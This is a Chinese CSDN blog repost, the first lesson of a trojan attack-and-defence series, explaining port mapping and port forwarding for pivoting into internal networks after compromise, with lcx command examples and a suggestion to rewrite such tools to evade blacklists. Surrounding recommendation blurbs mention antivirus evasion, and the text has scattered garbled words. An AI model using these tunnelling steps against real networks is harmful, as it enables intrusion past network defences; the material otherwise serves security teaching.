教你学木马攻防 | 隧道木马 | 第一课

最新推荐文章于 2023-12-15 12:15:00 发布
最新推荐文章于 2023-12-15 12:15:00 发布
阅读量242 收藏 1
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ccty9527/article/details/131152640
版权

前言

今天开始讲讲木马攻防,感受这些内容你们应该会更感兴趣一些,就从隧道木马提及。为何会有隧道木马这一说呢?这是根据通讯协议进行分类的。讲隧道木马以前,先讲讲端口映射和转发。端口映射和端口转发实际上是一回事,原理是同样的,因为应用场景不一样,才产生了不一样的含义。linux

场景1 端口映射

端口映射的使用,如下图为例,这是一个在渗透测试中,比较常见的场景。
在这里插入图片描述
一个hacker经过扫描暴露到公网中的主机A ,主机A开放了一些敏感端口,并且是弱口令,致使主机A被hacker彻底控制。github

接着hacker就想往公司内网中渗透,经过在主机A监控流量或者扫描的方式,发现了主机B,可是主机B只能由主机A进行访问,开放了80端口,并且没有公网ip。golang

若是hacker想直接访问主机B的 80端口,对上面的Web服务进行继续渗透,这就须要进行端口映射,让hacker能够远程链接到80端口。shell

从上图场景中看,端口映射是将内网主机B的80端口映射到了具备公网ip的主机A上,本质上是将一个原本没法访问的端口映射到能够访问的ip上了。windows

场景2 端口转发

端口转发又是另一个场景,在渗透测试中,也很常见。以下图所示。

在这里插入图片描述

  1. hacker位于主机A,主机A多是我的电脑,也多是hacker控制的主机。

  2. hacker经过发送恶意邮件的方式给主机B,主机B的用户点开邮件,运行恶意木马致使主机B被感染,就成了咱们俗称的“肉鸡”。虽然已经有木马运行在主机B中,可是因为主机B不在公网中,hacker没法访问到主机B。ssh

  3. 主机B运行着ssh服务,开放着22端口,hacker若是想在主机A上直接链接主机B的22端口,执行shell命令,这就须要端口转发。机器学习

那么木马怎么实现端口转发,才能让hacker访问主机B的22端口呢? 这就须要一台主机C,一个公网的VPS,去阿里云或者腾讯云买。木马的服务端运行在主机C,同时监听两个端口 port1 与port2,木马的客户端运行在主机B,分别主动链接主机B的22端口和主机C的port2,而hacker只须要主动链接主机C的port1,这样就打通了到主机B 22端口的线路。以下图所示。

lcx是一款内网端口转发工具,用于将内网主机开放的内部端口映射到外网主机(有公网IP)任意端口。这个工具很早就已经有了,如今已经有跨平台的了,支持在windows、linux下使用。还有一些根据lcx源码开发的其余版本,好比jsp版,http隧道版等等。代码以下:

https://github.com/windworst/LCX/

下面说一下它的使用以及功能说明:

Usage of Packet Transmit:

./lcx -<listen|tran|slave> [<-log|-hex|-text> file]

./lcx -about

[options:]

-listen

-tran

-slave

-hex : hex mode data dump

-text : text mode data dump

-log : save transfer log

对于场景1,可使用lcx的tran模式来实现。假设主机A 公网ip 10.10.10.1,主机B 内网ip为192.168.1.5,开放80端口。 在主机A上运行 :

./lcx -tran 8080 192.168.1.5 80

这个时候,hacker只要链接到主机A的8080端口,便可访问到主机B的80端口。

对于场景2,使用lcx的listen和slave模式来实现。假设主机C 公网ip 10.10.10.1,主机B 内网ip为192.168.1.5,开放22端口。 在主机C上监听8080和8081端口:

./lcx -listen 8080 8081

在主机B上链接22端口,并链接主机C的8081端口:

./lcx -slave 192.168.1.5 22 10.10.10.1 8081

这个时候,hacker只须要链接ip10.10.10.1的8080端口,便可直接链接到22端口,执行命令。

取代lcx

使用工具很简单,可是对这些工具的封锁也很简单。这些开源的网络安全工具早就处于防护端的黑名单里。所以本身写一个相似的工具也是一项必备的能力。 在github中就有这样相似的项目:

https://github.com/cw1997/NATBypass

代码很简单,只是单个golang文件,仿照lcx是实现了listen,tran和slave功能。关键的代码很简单,对应了下图中三个红框圈住的三个函数。

在这里插入图片描述

最后

关注公众号:七夜安全博客

在这里插入图片描述

原文 https://www.cnblogs.com/qiyeboy/p/10350621.html
二联 http://www.noobyard.com/link?url=https://www.cnblogs.com/qiyeboy/p/10350621.html

ccty9527
关注
一种基于多层联合分析的HTTP隧道木马检测方法 (2016年)
05-18
针对现有的基于网络层或传输层的木马通信行为检测方法应用到HTTP隧道木马的检测中识别精度较低的问题,提出一种基于多层联合分析的HTTP隧道木马检测方法。从应用层、传输层和网络层三个层面提取HTTP会话过程中区分隧道木马通信和正常通信的行为统计特征,采用基于主动习的SVM算法生成分类规则,建立检测系统。实验结果表明,基于多层联合分析的检测方法降低了已有方法的误报率和漏报率,并且引入主动习方法有效减少了人工标记的样本数量,提高了基于通信行为分析的HTTP隧道木马检测方法的实用性。
木马攻防培训班(第二课).rar
07-27
木马攻防培训 木马攻防培训木马攻防培训木马攻防培训木马攻防培训木马攻防培训木马攻防培训木马攻防培训木马攻防培训木马攻防培训木马攻防培训木马攻防培训木马攻防培训木马攻防培训
建立SSH隧道(SSH端口转发)
落叶翩翩的CSDN博客
01-29 9013
ssh隧道功能,也就是端口转发功能非常好用,可以实现一些代理功能或者是穿透内网功能。 ssh的端口转发(或者叫做隧道)命令分为三种: 本地:ssh -C -f -N -g -L listen_port:DST_Host:DST_port user@Tunnel_Host 远程:ssh -C -f -N -g -R listen_port:DST_Host:DST_port user@Tu
习记录(木马篇)
lfflzh22的专栏
11-02 394
今天看到书中写的关于将自己加载为windows服务的木马,于是乎,上网搜索了关于windows服务编程的资料,不得不说。。。中文版的资料真的是太糟糕了,乱七八糟的,中文语法都不对,直接谷歌翻译的吧?只好看英文了。。。。不过windows服务机制还挺有意思的,但个人感觉比较复杂。。。让我再研究研究,写好了,就把第一个成品发上来。
(菜鸟自木马与后门技术
最新发布
nbdlsplyb的博客
12-15 3813
它依赖于用户的行为,需要用户主动运行或安装木马文件。通过保持警惕,使用可信赖的安全软件,及时更新系统和应用程序,并避免点击可疑链接和下载未知来源的文件,可以有效减少木马对计算机和个人信息的风险。”,该路径是系统中的临时文件夹,系统会自动选中“”绝对路径,然后勾选“保存和还原路径”,选项允许自解压程序在注册表中存储用户输入的目标路径,并在自解压文件下一次运行时使用相同的解压路径。这些都是常见的木马分类,但需要注意的是,随着恶意软件技术的不断发展,新型的木马不断出现,可能具有多种复合的功能和特点。
网站木马习2
swort_177的专栏
01-07 1076
WebSite:一个IIS服务中可以包括很多的站点,这个就用于设置操作的站点。他的值是一个数字,默认是1,表示缺省站点,如果有其它,则从1开始依次类推。Egforeach (DirectoryEntry child in mydir.Children)            {                if (CheckIsNumber(child.Name.ToString
病毒、蠕虫、木马习笔记
sonflower123的博客
06-10 3353
网络安全
木马攻防技术
03-08
木马攻防技术是网络安全领域中的一个重要方面,涉及到对木马程序的识别、防护和应对策略。木马,源于古希腊神话的特洛伊木马故事,是一种隐蔽性极强的恶意软件,通常由两部分组成:服务器端和客户端。攻击者通过将...
网页木马攻防实战.rar
11-29
网页木马攻防实战是网络安全领域的一个重要主题,它涵盖了从攻击到防御的多个关键环节。这个主题的历史和发展反映了互联网安全的演变过程。在早期,网页木马主要通过诱骗用户点击恶意链接或下载含有恶意代码的文件...
论文研究-一种基于多层联合分析的HTTP隧道木马检测方法.pdf
07-22
针对现有的基于网络层或传输层的木马通信行为检测方法应用到HTTP隧道木马的检测中识别精度较低的问题,提出一种基于多层联合分析的HTTP隧道木马检测方法。从应用层、传输层和网络层三个层面提取HTTP会话过程中区分...
基于HTTP隧道的个人防火墙穿透技术研究
05-06
基于HTTP隧道的个人防火墙穿透技术研究,硕士论文,较为全面的介绍了防火墙扫描和穿透技术,设计和实现了基于反弹连接+HTTP隧道的防火墙穿透技术。注意下载CAJView打开。
浴血凤凰2012最新木马免杀第一课
02-26
【浴血凤凰2012最新木马免杀第一课】是一份专门针对网络安全领域的程,由知名安全研究团队“浴血凤凰”所制作。这个程的核心目标是会用户如何使恶意软件(木马)避开常见的反病毒软件检测,从而达到在目标...
成为黑客必须掌握的知识——木马原理
Python栈
03-02 864
一个完整的“”程序包含了两部分:“服务器”和“控制器”。植入你的电脑的是它的“服务器”部分,而所谓的“”正是利用“控制器”进入运行了“服务器”的电脑。众所周知,基于接入互联网的电脑有0到65535共256×256个端口。通常我们上网的时候,电脑通过139端口与外界保持联系。运行了的“服务器”以后,你的电脑就会有另一个或几个端口被打开,使可以利用这些打开的端口进入你的系统,你的系统安全和个人隐私也就全无保障了!如此“泛滥”,究竟我们怎么样才能知道我们的电脑被种上了木马呢?计算机一般由两部分组成,
HTTP代理原理以及HTTP隧道技术(经典)
热门推荐
zhangxinrun的专栏
10-14 1万+
<br />通过HTTP协议与代理服务器建立连接,协议信令中包含要连接到的远程主机的IP和端口号,如果有需要身份验证的话还需要加上授权信息,服务器收到信令后首先进行身份验证,通过后便与远程主机建立连接,连接成功之后会返回给客户端200,表示验证通过,就这么简单,下面是具体的信令格式:<br />CONNECT 124.xxx.xxx.xx:443 HTTP/1.1 //建立http隧道要443端口<br />Proxy-Connection: Keep-Alive   //客户端到服务器端的连接持续有效<b
HTTP代理原理以及HTTP隧道技术
wcppcw的专栏
04-09 853
通过HTTP协议与代理服务器建立连接,协议信令中包含要连接到的远程主机的IP和端口号,如果有需要身份验证的话还需要加上授权信息,服务器收到信令后首先进行身份验证,通过后便与远程主机建立连接,连接成功之后会返回给客户端200,表示验证通过,就这么简单,下面是具体的信令格式: CONNECT 124.xxx.xxx.xx:443 HTTP/1.1 //建立http隧道要443端口 Proxy-
反弹端口 HTTP代理 HTTP隧道技术
whatday的专栏
10-17 5816
现在,很多木马都利用了“反弹端口原理”与“HTTP隧道技术”,它的服务端(被控制端)会主动连接客户端(控制 端),因此,在互联网上可以访问到局域网里通过NAT代理(透明代理)上网的电脑,可以穿过防火墙( 包括:包过滤型及代理型防火墙) ,并且支持所有的上网方式,只要能浏览网页的电脑,这种木马都可以访问到,那么我们有必要了解一下此类木马用到的相关技术。      反弹端口原理:   
木马连接通用原理
lyle2000w的专栏
11-03 2953
木马可以算使一种特殊的远程控制软件,需要基于网络才能实现,而远程控制技术,始于DOS时代,只是出于种种原因而没有引起人们的重视。而随着网络的不断改进,该技术越来越受到重视,越来越普及,于是防范木马成了安全中不可少的课题,各种 层出不穷的方法来范。而木马作者为了木马的生存,也不断改进,连接技术就是木马技术中必不可少的。今天就和大家来初步探索下。    1、主动连接  这种连接方式
SubSeven服务端配置详解:木马攻防与防护策略
SubSeven服务端配置说明主要关注的是网络安全领域中的木马攻防技术,特别是针对恶意软件SubSeven进行配置和防护。以下是对配置选项的详细解析: 1. **启动方法 (Startup method)**: 通过在Windows注册表中的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值